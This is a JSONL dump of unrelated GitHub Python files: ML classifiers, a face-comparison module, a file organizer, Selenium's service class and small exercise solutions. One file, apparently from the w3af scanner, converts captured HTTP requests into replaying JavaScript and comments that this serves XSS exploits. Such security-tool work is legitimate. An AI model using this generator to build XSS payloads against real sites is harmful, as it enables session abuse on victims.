raw.extract(t_extract = text, param= var.get())\nb_extract.grid(row=3, column=1)\n\n# update button\nt_shift = Label(control, text=\"Shifting takes 4s\", foreground=\"blue\")\nt_shift.grid(row=4, column=2)\nb_shift = Button(control, text=\"shift\", activeforeground=\"blue\")\nb_shift['command'] = lambda text=t_shift: raw.Shift(t_shift=text)\nb_shift.grid(row=4, column=1)\n\n# update button\n# slider\nvar2 = DoubleVar()\nslider2 = Scale(control, variable=var2, orient=HORIZONTAL, to=5, from_=30)\nslider2.set(10)\nslider2.grid(row=5, column=0)\n\nt_cluster = Label(control, text=\"Clustering takes 7s\", foreground=\"blue\")\nt_cluster.grid(row=5, column=2)\nb_cluster = Button(control, text=\"cluster\", activeforeground=\"blue\")\nb_cluster['command'] = lambda text=t_cluster, slider=slider2: raw.Cluster(t_cluster= text, param= var2.get())\nb_cluster.grid(row=5, column=1)\n\n# update button\nt_label = Label(control, text=\"detecting takes 1s\", foreground=\"blue\")\nt_label.grid(row=6, column=2)\nb_detect = Button(control, text=\"detect\", activeforeground=\"blue\")\nb_detect['command'] = lambda text=t_label: raw.Detection(t_detect=text, result=result)\nb_detect.grid(row=6, column=1)\n\nroot.mainloop()","repo_name":"doublehidenblade/Vehicle-hail-dent-detection","sub_path":"Simpler.py","file_name":"Simpler.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17800371748","text":"from win10toast import ToastNotifier\nimport os,time\n\n# os.chdir(\"C:/Users/usert/Desktop/test\")\npath=os.getcwd()\ncurrent_folder=os.path.split(path)[-1] #gets working folder name to target\nfile_list=os.listdir(path)\nfor file in file_list:\n if file.endswith('.py' or '.pyw'):continue\n if os.path.isfile(file):\n src=os.path.join(path,file)\n folder_name=f\"{(os.path.splitext(file)[1])[1:]}_files\" #gets the extension of file\n try:\n if not os.path.exists(folder_name): #check if dir present\n os.mkdir(folder_name) #makes new dir\n except FileExistsError:pass\n\n dst=os.path.join(path,folder_name,file)\n try:\n os.rename(src,dst)\n except FileExistsError: #renames file name as 'copy_of_file'\n dst=os.path.join(path,folder_name,'copy_of_'+file)\n os.rename(src,dst)\n\n#Windows notification, autocollapse after 3 sec\ntoaster=ToastNotifier()\ntoaster.show_toast(f\"From {current_folder.capitalize()} Folder\",\"folder organized\",duration=3)\n","repo_name":"JemitDave/Automation_scripts","sub_path":"declutter_code/script_for_clutterfree_folder_4.py","file_name":"script_for_clutterfree_folder_4.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32386259220","text":"import pandas as pd\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.impute import SimpleImputer\n\nfrom sklearn.metrics import f1_score\n\nfrom imblearn.combine import SMOTETomek \n\n# ------------------------- print results ------------------------- #\n\ndef print_classification_results(y_insample, y_outsample):\n \"\"\" Takes in a dataframe with column-separated model predictions, \n Calculates accuracy and recall of each model (loops 
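The declutter script above has a subtle bug: `file.endswith('.py' or '.pyw')` evaluates `'.py' or '.pyw'` first, so only `.py` is ever skipped. A pathlib sketch of the same extension-sorting move that checks both suffixes and keeps the `copy_of_` collision rename:

```python
from pathlib import Path

def organize(folder: str) -> None:
    root = Path(folder)
    for f in root.iterdir():
        if not f.is_file() or f.suffix in {".py", ".pyw"}:
            continue
        target_dir = root / f"{f.suffix.lstrip('.')}_files"
        target_dir.mkdir(exist_ok=True)         # idempotent, no try/except needed
        target = target_dir / f.name
        if target.exists():
            target = target_dir / f"copy_of_{f.name}"
        f.rename(target)
```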
columns) for in- and out-sample data,\n Appends all results to running dataframe, \n Returns dataframe. \"\"\"\n # create empty results dataframe\n running_df = pd.DataFrame(columns=['Model','InSample_Accuracy','OutSample_Accuracy',\n 'InSample_Recall','OutSample_Recall',\n 'InSample_Precision','OutSample_Precision',\n 'InSample_F1_Score','OutSample_F1_Score'])\n # loop through each model\n for model in y_insample.columns[1:]:\n # calculate model accuracy\n in_accuracy = (y_insample[model] == y_insample.in_actuals).mean()\n out_accuracy = (y_outsample[model] == y_outsample.out_actuals).mean()\n # determine sums of true positives and false negatives for recall and precision calculations\n # true positive: model correctly predicts 1 when actual is 1\n # false negative: model wrongly predicts 0 when actual is 1\n in_true_positive = ((y_insample[model] == 1) & (y_insample['in_actuals'] == 1)).sum()\n in_false_positive = ((y_insample[model] == 1) & (y_insample['in_actuals'] == 0)).sum()\n in_false_negative = ((y_insample[model] == 0) & (y_insample['in_actuals'] == 1)).sum()\n out_true_positive = ((y_outsample[model] == 1) & (y_outsample['out_actuals'] == 1)).sum()\n out_false_positive = ((y_outsample[model] == 1) & (y_outsample['out_actuals'] == 0)).sum()\n out_false_negative = ((y_outsample[model] == 0) & (y_outsample['out_actuals'] == 1)).sum()\n # calculate recall and precision scores\n in_recall = in_true_positive / (in_true_positive + in_false_negative)\n out_recall = out_true_positive / (out_true_positive + out_false_negative)\n in_precision = in_true_positive / (in_true_positive + in_false_positive)\n out_precision = out_true_positive / (out_true_positive + out_false_positive)\n # calculate f1 score\n in_f1_score = (2 * in_precision * in_recall) / (in_precision + in_recall)\n out_f1_score = (2 * out_precision * out_recall) / (out_precision + out_recall)\n # add results to new row in dataframe\n running_df = running_df.append({'Model':model,\n 'InSample_Accuracy':round(in_accuracy, 4), \n 'OutSample_Accuracy':round(out_accuracy, 4),\n 'InSample_Recall':round(in_recall, 4),\n 'OutSample_Recall':round(out_recall, 4),\n 'InSample_Precision':round(in_precision, 4),\n 'OutSample_Precision':round(out_precision, 4),\n 'InSample_F1_Score':round(in_f1_score, 4),\n 'OutSample_F1_Score':round(out_f1_score, 4)},\n ignore_index=True)\n\n return running_df # return results dataframe\n\n# -------------------------- the shotgun -------------------------- #\n\ndef classification_shotgun(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Take in Pandas Series for classification and target (pass columns!),\n Create several DecisionTree, RandomForest, LogisticRegression, Naive Bayes,\n and KNearest classification models, \n Push model predictions to originating dataframe, return dataframe \"\"\"\n # convert predictions column (usually Series) to dataframe\n if type(y_insample) != 'pandas.core.frame.DataFrame':\n y_insample = pd.DataFrame(y_insample.rename('in_actuals'))\n if type(y_outsample) != 'pandas.core.frame.DataFrame':\n y_outsample = pd.DataFrame(y_outsample.rename('out_actuals'))\n # Baseline - add predictions to df\n y_insample, y_outsample = classification_bl(y_insample, y_outsample)\n # Decision Tree classifier - add predictions to df\n y_insample, y_outsample = decisiontree(X_insample, y_insample, X_outsample, y_outsample)\n # Random Forest classifier - add predictions to df\n y_insample, y_outsample = randomforest(X_insample, y_insample, X_outsample, y_outsample)\n # Logistic 
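The metric arithmetic in `print_classification_results` above divides by `(precision + recall)` and by the true-positive sums, which raises `ZeroDivisionError` whenever a model predicts no positives. A zero-safe version of the same counts-based formulas:

```python
def prf1(tp: int, fp: int, fn: int):
    precision = tp / (tp + fp) if (tp + fp) else 0.0
    recall = tp / (tp + fn) if (tp + fn) else 0.0
    f1 = (2 * precision * recall / (precision + recall)) if (precision + recall) else 0.0
    return precision, recall, f1

print(prf1(8, 2, 4))  # precision=0.8, recall≈0.667, f1≈0.727
```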
Regression classifier - add predictions to df\n y_insample, y_outsample = logisticregression(X_insample, y_insample, X_outsample, y_outsample)\n # Naive Bayes classifier - add predictions to df\n y_insample, y_outsample = naivebayes(X_insample, y_insample, X_outsample, y_outsample)\n # K-Nearest Neighbors classifier - add predictions to df\n y_insample, y_outsample = knearestneighbors(X_insample, y_insample, X_outsample, y_outsample)\n \n return y_insample, y_outsample # return dataframes of predictions\n\n# -------------------------- the models -------------------------- #\n\ndef manual_baseline(y_insample, y_outsample, baseline_value):\n \"\"\" Add a column for the manually-selected baseline prediction \"\"\"\n # set each value to the chosen baseline value\n y_insample['manual_baseline'] = baseline_value\n y_outsample['manual_baseline'] = baseline_value\n\n return y_insample, y_outsample # return df with baseline predictions column\n\ndef classification_bl(y_insample, y_outsample):\n \"\"\" Calculate baseline using mode class for model comparison \"\"\"\n # find baseline\n mode = y_insample.in_actuals.mode().tolist()[0]\n # set baseline as prediction\n y_insample['baseline'] = mode\n y_outsample['baseline'] = mode\n\n return y_insample, y_outsample # return df with baseline predictions column\n\ndef decisiontree(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Creates decision trees with max_depth 1,2,3,5,10 and random_state=123 \"\"\"\n # set loop list\n max_depths = [1,2,3,5,10]\n # loop through max depths\n for depth in max_depths:\n # create decision trees\n tree = DecisionTreeClassifier(max_depth=depth, random_state=123)\\\n .fit(X_insample, y_insample.in_actuals)\n # make predictions in new columns\n y_insample['tree_maxdepth' + str(depth)] = tree.predict(X_insample)\n y_outsample['tree_maxdepth' + str(depth)] = tree.predict(X_outsample)\n\n return y_insample, y_outsample # return dataframe with predictions appended\n\ndef randomforest(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Creates random forests with max_depth 1,2,3,5,10 and random_state=123 \"\"\"\n # set loop list\n max_depths = [1,2,3,5,10]\n # loop through max depths\n for depth in max_depths:\n # create random forest model\n rf = RandomForestClassifier(max_depth=depth, random_state=123)\\\n .fit(X_insample, y_insample.in_actuals)\n # make predictions in new columns\n y_insample['rf_depth' + str(depth)] = rf.predict(X_insample)\n y_outsample['rf_depth' + str(depth)] = rf.predict(X_outsample)\n \n return y_insample, y_outsample # return dataframe with predictions appended\n\ndef logisticregression(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Creates logistic regressions with random_state=123 \"\"\"\n # create logistic regression model\n logit = LogisticRegression(random_state=123)\\\n .fit(X_insample, y_insample.in_actuals)\n # add columns for predictions\n y_insample['logit'] = logit.predict(X_insample)\n y_outsample['logit'] = logit.predict(X_outsample)\n \n return y_insample, y_outsample # return dataframe with predictions appended\n\ndef naivebayes(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Creates Naive-Bayes with var_smoothing of .001, .01, 10, 100 \"\"\"\n # set loop list\n smooth_levels = [.000000001, .00000001, .0000001, .000001, .00001, .0001, .001, .01, 10, 100]\n # loop through smoothing levels\n for smooth_level in smooth_levels:\n # create naive bayes model\n nb = GaussianNB(var_smoothing=smooth_level)\\\n .fit(X_insample, y_insample.in_actuals)\n # 
make predictions in new column\n y_insample['nb_vsmooth' + str(smooth_level)] = nb.predict(X_insample)\n y_outsample['nb_vsmooth' + str(smooth_level)] = nb.predict(X_outsample)\n \n return y_insample, y_outsample # return dataframe with preds appended\n\ndef knearestneighbors(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Create KNNs with neighbor counts of 3, 5, 10, 25, 75 \"\"\"\n # set loop list\n neighbor_counts = [3,5,10,25,75]\n # loop through neighbor counts\n for neighbor_count in neighbor_counts:\n # create knn model\n knn = KNeighborsClassifier(n_neighbors=neighbor_count)\\\n .fit(X_insample, y_insample.in_actuals)\n # make predictions in new column\n y_insample['knn_n' + str(neighbor_count)] = knn.predict(X_insample)\n y_outsample['knn_n' + str(neighbor_count)] = knn.predict(X_outsample)\n \n return y_insample, y_outsample # return dataframe with preds appended\n\n# ------------------------- pre-processing ------------------------- #\n\ndef Min_Max_Scaler(X_train, X_validate, X_test):\n \"\"\"\n Takes in X_train, X_validate and X_test dfs with numeric values only\n Returns scaler, X_train_scaled, X_validate_scaled, X_test_scaled dfs\n \"\"\"\n #Fit the thing\n scaler = MinMaxScaler().fit(X_train)\n #transform the thing\n X_train_scaled = pd.DataFrame(scaler.transform(X_train), index = X_train.index, columns = X_train.columns)\n X_validate_scaled = pd.DataFrame(scaler.transform(X_validate), index = X_validate.index, columns = X_validate.columns)\n X_test_scaled = pd.DataFrame(scaler.transform(X_test), index = X_test.index, columns = X_test.columns)\n return scaler, X_train_scaled, X_validate_scaled, X_test_scaled\n\ndef smoter(X_train, y_train):\n \"\"\" Use SMOTE+Tomek to eliminate class imbalances for train split \"\"\"\n # build SMOTE\n smtom = SMOTETomek(random_state=123)\n # SMOTE the train set\n X_train_smtom, y_train_smtom = smtom.fit_resample(X_train, y_train)\n # show before-and-after\n print(\"Before SMOTE applied:\", X_train.shape, y_train.shape)\n print(\"After SMOTE applied:\", X_train_smtom.shape, y_train_smtom.shape)\n\n return X_train_smtom, y_train_smtom # return SMOTE-d train data\n\n# ------------------ risk_calculator.py functions ------------------ #\n\ndef risk_calculator_prep_data():\n \"\"\"\n Ingests the healthcare dataset,\n Drops the same rows that were dropped for analysis,\n Cleans and encodes data as necessary,\n Limits the data to the required features,\n Splits the data in the same way as was done for the team's analysis,\n Isolates the target from the split needed to train the model,\n Oversamples the data the same way it was done for the analysis,\n Return the data needed to train the model.\n \"\"\"\n # ingest data\n df = pd.read_csv('healthcare-dataset-stroke-data.csv')\n # drops a few rows that were dropped for other reasons in analysis\n df = df.drop([3116,2128,4209]).reset_index().drop(columns='index')\n # create features\n df['stroke'] = df['stroke'] == 1\n df['high_glucose'] = df['avg_glucose_level'] >= 125\n df['has_hypertension'] = df['hypertension'] == 1\n df['has_heart_disease'] = df['heart_disease'] == 1\n df['ever_married'] = df['ever_married'] == 'Yes'\n # limit to required features\n df = df[['stroke','age','high_glucose','has_hypertension','has_heart_disease','ever_married']]\n # split data\n train_validate, test = train_test_split(df, test_size=.2, random_state=777)\n train, validate = train_test_split(train_validate, test_size=.25, random_state=777)\n # isolate target\n X_train, y_train = 
train.drop(columns='stroke'), train.stroke\n # SMOTE+Tomek oversampling\n \"\"\" Use SMOTE+Tomek to eliminate class imbalances for train split \"\"\"\n # build SMOTE\n smtom = SMOTETomek(random_state=123)\n # SMOTE the train set\n X_train, y_train = smtom.fit_resample(X_train, y_train)\n # return data needed to train model\n return X_train, y_train\n\ndef risk_calculator_calculate_risk(user_input_row):\n \"\"\"\n Re-creates the best-performing model from the Stroke Prediction team's analysis,\n Fits it on the data used in the analysis,\n Use sklearn's predict_proba method to calculate the risk of stroke,\n Return the calculated number.\n \"\"\"\n X_train, y_train = risk_calculator_prep_data()\n model = GaussianNB(var_smoothing=.01).fit(X_train, y_train)\n calculated_risk = model.predict_proba(user_input_row)\n calculated_risk = int(calculated_risk[0][1] * 100)\n\n return calculated_risk","repo_name":"stroke-predictors/germain-capstone-stroke-prediction","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16406225507","text":"import cv2\nimport dlib\nimport numpy as np # upgrade to 1.8.0\nfrom scipy.spatial import distance\n\n'''\nGet largest detected faces from an image\n input : image (png,jpg,jfif,jpeg)\n return: rectangle\n'''\ndef crop_face(image):\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n face_detector = dlib.get_frontal_face_detector()\n detected_faces = face_detector(image, 1)\n if(len(detected_faces)==0):\n return None\n else:\n max = 0\n for i,face_rect in enumerate(detected_faces):\n if((face_rect.width()+face_rect.height()) > (detected_faces[max].width()+detected_faces[max].height())):\n max = i\n return detected_faces[max]\n\n'''\nCheck if a input threshold can be converted to float and is greater than 0\n input : string\n return: threshold: float, valid: boolean\n'''\ndef validate_threshold(threshold_string):\n valid = False\n try : \n threshold = float(threshold_string) \n if(threshold > 0):\n valid = True\n except : \n threshold = None\n\n return threshold, valid\n \n\n'''\nCompare the face from 2 different picture\n input : \n - img_1 : first image to compare\n - img_2 : second image to compare\n - threshold : threshold for classification\n return : \n - dst : distance of image compare result using euclidean\n - res : result of image comparation, True if same person, False if different person\n - message : information about process result\n'''\ndef face_compare_process(img_file_1, img_file_2, threshold):\n try:\n # Load image 1 and image 2 file\n img_1 = cv2.imdecode(np.frombuffer(img_file_1, np.uint8), cv2.COLOR_BGR2RGB)\n img_2 = cv2.imdecode(np.frombuffer(img_file_2, np.uint8), cv2.COLOR_BGR2RGB)\n \n # Crop face from both image\n dets_1 = crop_face(img_1)\n dets_2 = crop_face(img_2)\n\n if(dets_1 is None or dets_2 is None):\n raise Exception(\"Face not found\")\n\n shape = sp_68(img_1, dets_1)\n face_descriptor_1 = facerec.compute_face_descriptor(img_1, shape)\n if(len(face_descriptor_1)==0):\n shape = sp_5(img_1, dets)\n face_descriptor_1 = facerec.compute_face_descriptor(img_1, shape)\n\n shape = sp_68(img_2, dets_2)\n face_descriptor_2 = facerec.compute_face_descriptor(img_2, shape)\n if(len(face_descriptor_2)==0):\n shape = sp_5(img_2, dets)\n face_descriptor_2 = facerec.compute_face_descriptor(img_2, shape)\n \n # Measure the distance\n dst = distance.euclidean(face_descriptor_1, face_descriptor_2)\n res = 
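Stripped to its core, `face_compare_process` above computes two descriptors and accepts the match when their Euclidean distance falls under the caller's threshold. A numpy sketch of that final decision; the 0.6 default is a value often quoted for dlib's ResNet descriptors, assumed here rather than taken from this code:

```python
import numpy as np

def same_person(desc_a, desc_b, threshold: float = 0.6) -> bool:
    # Euclidean distance between the two embedding vectors.
    dst = float(np.linalg.norm(np.asarray(desc_a) - np.asarray(desc_b)))
    return dst < threshold
```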
dst < threshold\n\n return dst,res,\"Operation successful\"\n\n except Exception as e:\n return None,None,e.args\n\nsp_5 = dlib.shape_predictor('model/shape_predictor_5_face_landmarks.dat')\nsp_68 = dlib.shape_predictor('model/shape_predictor_68_face_landmarks.dat')\nfacerec = dlib.face_recognition_model_v1('model/dlib_face_recognition_resnet_model_v1.dat')\nprint(\"Load Models\")","repo_name":"irhw110/Face_Comparation_API","sub_path":"functions/face_compare.py","file_name":"face_compare.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22875471133","text":"# Exercise 3: Write a program to read through a mail log, build a histogram using a dictionary to count how many messages have come from\n# each email address, and print the dictionary.\n\nfile = open('test.txt')\ncount = dict()\nfor line in file:\n line = line.strip()\n if not line.startswith(\"From\"):\n continue\n words = line.split()\n if len(words) < 3:\n continue\n mail = words[1]\n count[mail] = count.get(mail, 0) + 1\nprint(count)\n","repo_name":"YanShtein/PythonForEverybody","sub_path":"009.3.mail_count.py","file_name":"009.3.mail_count.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32223826261","text":"import imp\nfrom typing import List\nimport collections\n# o(n^2) Accepted\nclass Solution:\n def findRightInterval(self, intervals: List[List[int]]) -> List[int]:\n index_map = collections.defaultdict(int)\n for idx, interval in enumerate(intervals):\n index_map[interval[0], interval[1]] = idx\n \n intervals.sort(key= lambda x: x[0])\n ans = [0 for i in range(len(intervals))]\n for i in range(len(intervals)):\n find = False\n for inter in intervals[i:]:\n if inter[0] >= intervals[i][1]:\n ans[index_map[intervals[i][0], intervals[i][1]]] = index_map[inter[0], inter[1]]\n find = True\n break\n if not find:\n ans[index_map[intervals[i][0], intervals[i][1]]] = -1\n \n return ans\n\nsol = Solution()\nintervals = [[1,1],[3,4]]\n\nres = sol.findRightInterval(intervals)\nprint(res)\n\n\n \n\n\n\n\n\n\n ","repo_name":"chrisbyd/leetcode_chris","sub_path":"array/436.py","file_name":"436.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42562047704","text":"from core.data.parsers.httpRequestParser import httpRequestParser\n\n\ndef ajax_escape_string( str_in ):\n str_out = str_in.replace('\"', '\\\\\"')\n return str_out\n\n\ndef ajax_export( request_string ):\n '''\n @parameter request_string: The string of the request to export\n @return: A javascript that will perform the same HTTP request.\n '''\n # get the header and the body\n splitted_request = request_string.split('\\n\\n')\n header = splitted_request[0]\n body = '\\n\\n'.join(splitted_request[1:])\n \n http_request = httpRequestParser( header, body)\n \n # Now I do the real magic...\n # This is the header, to include the AJAX stuff:\n res = '''/* Init AJAX stuff */\n \nvar xmlhttp=false;\n/*@cc_on @*/\n/*@if (@_jscript_version >= 5)\n// JScript gives us Conditional compilation, we can cope with old IE versions.\n// and security blocked creation of the objects.\ntry {\n xmlhttp = new ActiveXObject(\"Msxml2.XMLHTTP\");\n} catch (e) {\n try {\n xmlhttp = new ActiveXObject(\"Microsoft.XMLHTTP\");\n } catch (E) {\n xmlhttp = false;\n }\n}\n@end @*/\n\nif (!xmlhttp && typeof 
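The `findRightInterval` record above notes it is O(n^2). Sorting the start points once and binary-searching each interval's end gives the standard O(n log n) answer to the same problem:

```python
import bisect
from typing import List

def find_right_interval(intervals: List[List[int]]) -> List[int]:
    # Sort (start, original index) pairs once, then binary search each end.
    starts = sorted((s, i) for i, (s, _) in enumerate(intervals))
    keys = [s for s, _ in starts]
    res = []
    for _, e in intervals:
        j = bisect.bisect_left(keys, e)
        res.append(starts[j][1] if j < len(starts) else -1)
    return res

print(find_right_interval([[3, 4], [2, 3], [1, 2]]))  # [-1, 0, 1]
```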
XMLHttpRequest!='undefined') {\n try {\n xmlhttp = new XMLHttpRequest();\n } catch (e) {\n xmlhttp=false;\n }\n}\nif (!xmlhttp && window.createRequest) {\n try {\n xmlhttp = window.createRequest();\n } catch (e) {\n xmlhttp=false;\n }\n}\n/* Finished AJAX initialization */\n\n/* Create the request */\n'''\n \n # Set the method and the path\n res += 'xmlhttp.open(\"' + http_request.getMethod() + '\", \"'\n res += ajax_escape_string( http_request.getURI().url_string ) + '\",true);\\n'\n\n # For debugging\n res += '''\n/* Debugging code, this should be removed for real life XSS exploits */\nxmlhttp.onreadystatechange=function() {\n if (xmlhttp.readyState==4) {\n alert(xmlhttp.responseText)\n }\n}\n\n\n/* Add headers to the request and send it */\n'''\n\n # Now I add the headers:\n headers = http_request.getHeaders()\n for header_name in headers:\n res += 'xmlhttp.setRequestHeader(\"' + ajax_escape_string(header_name) + '\", \"'\n res += ajax_escape_string(headers[header_name]) + '\");\\n'\n \n # And finally the post data (if any)\n if http_request.getData() and http_request.getData() != '\\n':\n res += 'var post_data = ().toString();\\n'\n res += 'xmlhttp.send(post_data);\\n'\n else:\n res += 'xmlhttp.send(null);\\n'\n \n return res\n","repo_name":"adambaldwin2/test","sub_path":"core/data/export/ajax_export.py","file_name":"ajax_export.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27685624225","text":"import errno\nimport logging\nimport os\nimport subprocess\nimport typing\nfrom abc import ABC\nfrom abc import abstractmethod\nfrom platform import system\nfrom subprocess import DEVNULL\nfrom subprocess import PIPE\nfrom time import sleep\nfrom urllib import request\nfrom urllib.error import URLError\n\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.types import SubprocessStdAlias\nfrom selenium.webdriver.common import utils\nfrom selenium.webdriver.common.selenium_manager import SeleniumManager\n\nlogger = logging.getLogger(__name__)\n\n\n_HAS_NATIVE_DEVNULL = True\n\n\nclass Service(ABC):\n \"\"\"The abstract base class for all service objects. 
Services typically launch a child program\n in a new process as an interim process to communicate with a browser.\n\n :param executable: install path of the executable.\n :param port: Port for the service to run on, defaults to 0 where the operating system will decide.\n :param log_file: (Optional) file descriptor (pos int) or file object with a valid file descriptor.\n subprocess.PIPE & subprocess.DEVNULL are also valid values.\n :param env: (Optional) Mapping of environment variables for the new process, defaults to `os.environ`.\n \"\"\"\n\n def __init__(\n self,\n executable: str,\n port: int = 0,\n log_file: SubprocessStdAlias = DEVNULL,\n env: typing.Optional[typing.Mapping[typing.Any, typing.Any]] = None,\n start_error_message: typing.Optional[str] = None,\n ) -> None:\n self.path = executable\n self.port = port or utils.free_port()\n self.log_file = open(os.devnull, \"wb\") if not _HAS_NATIVE_DEVNULL and log_file == DEVNULL else log_file\n self.start_error_message = start_error_message or \"\"\n # Default value for every python subprocess: subprocess.Popen(..., creationflags=0)\n self.creation_flags = 0\n self.env = env or os.environ\n\n @property\n def service_url(self) -> str:\n \"\"\"\n Gets the url of the Service\n \"\"\"\n return f\"http://{utils.join_host_port('localhost', self.port)}\"\n\n @abstractmethod\n def command_line_args(self) -> typing.List[str]:\n \"\"\"A List of program arguments (excluding the executable).\"\"\"\n raise NotImplementedError(\"This method needs to be implemented in a sub class\")\n\n def start(self) -> None:\n \"\"\"\n Starts the Service.\n\n :Exceptions:\n - WebDriverException : Raised either when it can't start the service\n or when it can't connect to the service\n \"\"\"\n try:\n self._start_process(self.path)\n except WebDriverException as err:\n if \"executable needs to be in PATH\" in err.msg:\n logger.debug(\"driver not found in PATH, trying Selenium Manager\")\n browser = self.__class__.__module__.split(\".\")[-2]\n\n try:\n path = SeleniumManager().driver_location(browser)\n except WebDriverException as new_err:\n logger.debug(\"Unable to obtain driver using Selenium Manager: \" + new_err.msg)\n raise err\n\n self._start_process(path)\n\n count = 0\n while True:\n self.assert_process_still_running()\n if self.is_connectable():\n break\n\n count += 1\n sleep(0.5)\n if count == 60:\n raise WebDriverException(f\"Can not connect to the Service {self.path}\")\n\n def assert_process_still_running(self) -> None:\n \"\"\"Check if the underlying process is still running.\"\"\"\n return_code = self.process.poll()\n if return_code:\n raise WebDriverException(f\"Service {self.path} unexpectedly exited. 
Status code was: {return_code}\")\n\n def is_connectable(self) -> bool:\n \"\"\"Establishes a socket connection to determine if the service running on\n the port is accessible.\"\"\"\n return utils.is_connectable(self.port)\n\n def send_remote_shutdown_command(self) -> None:\n \"\"\"\n Dispatch an HTTP request to the shutdown endpoint for the service in an\n attempt to stop it.\n \"\"\"\n try:\n request.urlopen(f\"{self.service_url}/shutdown\")\n except URLError:\n return\n\n for _ in range(30):\n if not self.is_connectable():\n break\n sleep(1)\n\n def stop(self) -> None:\n \"\"\"\n Stops the service.\n \"\"\"\n if self.log_file != PIPE and not (self.log_file == DEVNULL and _HAS_NATIVE_DEVNULL):\n try:\n # Todo: Be explicit in what we are catching here.\n if hasattr(self.log_file, \"close\"):\n self.log_file.close() # type: ignore\n except Exception:\n pass\n\n if self.process is not None:\n try:\n self.send_remote_shutdown_command()\n except TypeError:\n pass\n self._terminate_process()\n\n def _terminate_process(self) -> None:\n \"\"\"Terminate the child process. On POSIX this attempts a graceful\n SIGTERM followed by a SIGKILL, on a Windows OS kill is an alias to\n terminate. Terminating does not raise itself if something has gone\n wrong but (currently) silently ignores errors here.\"\"\"\n try:\n stdin, stdout, stderr = self.process.stdin, self.process.stdout, self.process.stderr\n for stream in stdin, stdout, stderr:\n try:\n stream.close() # type: ignore\n except AttributeError:\n pass\n self.process.terminate()\n self.process.wait(60)\n # Todo: only SIGKILL if necessary; the process may be cleanly exited by now.\n self.process.kill()\n except OSError:\n logger.error(\"Error terminating service process.\", exc_info=True)\n\n def __del__(self) -> None:\n # `subprocess.Popen` doesn't send signal on `__del__`;\n # so we attempt to close the launched process when `__del__`\n # is triggered.\n # do not use globals here; interpreter shutdown may have already cleaned them up\n # and they would be `None`. This goes for anything this method is referencing internally.\n try:\n self.stop()\n except Exception:\n pass\n\n def _start_process(self, path: str) -> None:\n \"\"\"\n Creates a subprocess by executing the command provided.\n\n :param cmd: full command to execute\n \"\"\"\n cmd = [path]\n cmd.extend(self.command_line_args())\n try:\n self.process = subprocess.Popen(\n cmd,\n env=self.env,\n close_fds=system() != \"Windows\",\n stdout=self.log_file,\n stderr=self.log_file,\n stdin=PIPE,\n creationflags=self.creation_flags,\n )\n logger.debug(f\"Started executable: `{self.path}` in a child process with pid: {self.process.pid}\")\n except TypeError:\n raise\n except OSError as err:\n if err.errno == errno.ENOENT:\n raise WebDriverException(\n f\"'{os.path.basename(self.path)}' executable needs to be in PATH. {self.start_error_message}\"\n )\n elif err.errno == errno.EACCES:\n raise WebDriverException(\n f\"'{os.path.basename(self.path)}' executable may have wrong permissions. {self.start_error_message}\"\n )\n else:\n raise\n except Exception as e:\n raise WebDriverException(\n f\"The executable {os.path.basename(self.path)} needs to be available in the path. 
{self.start_error_message}\\n{str(e)}\"\n )\n","repo_name":"cwyrwas/ChatGPT-Content-Generator","sub_path":".venv/Lib/site-packages/selenium/webdriver/common/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":7856,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"61"} +{"seq_id":"23413576041","text":"#!/usr/bin/python\n\nimport sys\n\n\ndef solveThingy(firstAnswer, firstArangement, secondAnswer, secondArangement):\n\tcandidates = firstArangement[firstAnswer-1]\n\tanswers = []\n\tfor num in secondArangement[secondAnswer-1]:\n\t\tif num in candidates:\n\t\t\tanswers += [num]\n\t\n\treturn answers\n\nf = open(\"input.txt\")\nnumTests = int(f.readline())\noutput = \"\"\nfor i in range(numTests):\n\tfirstAnswer = int(f.readline())\n\tfirstArangement = []\n\tfor j in range(4):\n\t\tline = []\n\t\tfor num in f.readline().split(' '):\n\t\t\tline += [int(num)]\n\t\tfirstArangement += [line]\n\tsecondAnswer = int(f.readline())\n\tsecondArangement = []\n\tfor j in range(4):\n\t\tline = []\n\t\tfor num in f.readline().split(' '):\n\t\t\tline += [int(num)]\n\t\tsecondArangement += [line]\n\n\tanswers = solveThingy(firstAnswer, firstArangement, secondAnswer, secondArangement)\n\n\tif len(answers) == 1:\n\t\toutput += \"Case #\" + str(i+1) + \": \" + str(answers[0]) + '\\n'\n\telif len(answers) == 0:\n\t\toutput += \"Case #\" + str(i+1) + \": Volunteer cheated!\" + '\\n'\n\telse:\n\t\toutput += \"Case #\" + str(i+1) + \": Bad magician!\" + '\\n'\n\t\t\nfout = open(\"output.txt\", 